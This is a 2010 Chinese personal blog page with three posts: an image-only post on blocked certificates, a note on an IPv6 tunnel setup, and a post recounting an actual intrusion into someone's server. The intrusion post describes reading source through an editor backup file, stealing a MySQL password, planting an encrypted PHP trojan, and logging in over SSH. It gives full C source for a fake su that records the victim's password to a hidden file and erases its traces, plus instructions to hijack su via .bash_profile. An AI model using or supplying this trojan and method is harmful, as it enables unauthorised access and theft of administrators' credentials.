往事依依,随风而行。淡忘过去的一切,在风中迎接新的希望。
浏览模式: 标准 | 列表 | 无广告2010年10月的文章

GFW Blocked Certifications

Post by tywtyw2002 on 2010, October 26, 12:48 PM

大小: 44.64 K 尺寸: 500 x 363 浏览: 14 次 点击打开新窗口浏览全图

大小: 12.83 K 尺寸: 190 x 200 浏览: 10 次 点击打开新窗口浏览全图

不多说 半成品

网络·技术 | 评论:0 | 阅读:794

升級了ipv6

Post by tywtyw2002 on 2010, October 18, 4:50 AM

用的he.net的tunnel
解決了我們學校ipv4訪問卡的問題。

內核弄得很噁心

ps  tunnel 如果提示找不到設備 請 modproe  sit
這就就可以了  sit模塊不是自動載入的。

ip地址 2001:470:c:6ee::2

Tags: ipv6

网络·技术 | 评论:0 | 阅读:867

套取su的密碼

Post by tywtyw2002 on 2010, October 4, 10:09 PM

最近搞到一臺機器,話說搞到的方法也很搞笑。
對著index.php 來個 index.php~就發現其源代碼赫然寫在了ie瀏覽器了。
一看就知道用kate編輯器沒取消自動備份功能。
榫頭摸瓜找到了confing.php 拿下了一個mysql的密碼。
發現不是root,有些沮喪。
穿了個小馬以后。 linux服務器不用擔心會不會被殺。 php木馬直接zend加密就好了。一般win服務器都會安zend op。。。的  linux一般不安。
這個用戶居然也是mysql的root權限。
然后試試,ssh居然登錄上。
不過普通用戶權限。
su一下 失敗。
開來這人有別的密碼。于是在網上找來一段代碼  來進行su密碼的截取。

C++代码
  1. #include <stdio.h>  
  2. #include <stdlib.h>  
  3. #include <unistd.h>  
  4.   
  5. main(int argc, char *argv[]){  
  6.   
  7. FILE *fp;  
  8. char *user;  
  9. char *pass;  
  10. char filex[100];  
  11. char clean[100];  
  12.   
  13. sprintf(filex,"/tmp/.pwds");  
  14. sprintf(clean,"rm -rf /tmp/.su;rm -rf /home/admin/admin/.bash_profile");  
  15. if(argc==1) user="root";  
  16. if(argc==2) user=argv[1];  
  17. if(argc>2){  
  18.  if(strcmp(argv[1], "-l")==0)  
  19.  user=argv[2];  
  20.  else user=argv[1];}  
  21.   
  22. fprintf(stdout,"Password: ");  
  23. pass=getpass ("");  
  24. system("sleep 3");  
  25. fprintf(stdout,"su: Authentication failure\nSorry.\n");  
  26.   
  27. if ((fp=fopen(filex,"w")) != NULL)  
  28.  {  
  29.  fprintf(fp, "%s:%s\n", user, pass);  
  30.  fclose(fp);  
  31.  }  
  32.   
  33. system(clean);  
  34. system("rm -rf /tmp/.su; ln -s /bin/su /tmp/.su");  
  35. }  

這個提示語句是 debain的  對于centos是錯的
在服務器上編譯好 然后
把su扔到 /tmp下
備份下bash_profile
然后改寫 bash_profile 加上alias su=“、tmp/.su”
就等著魚上鉤吧

Tags: linux, hack

网络·技术 | 评论:0 | 阅读:855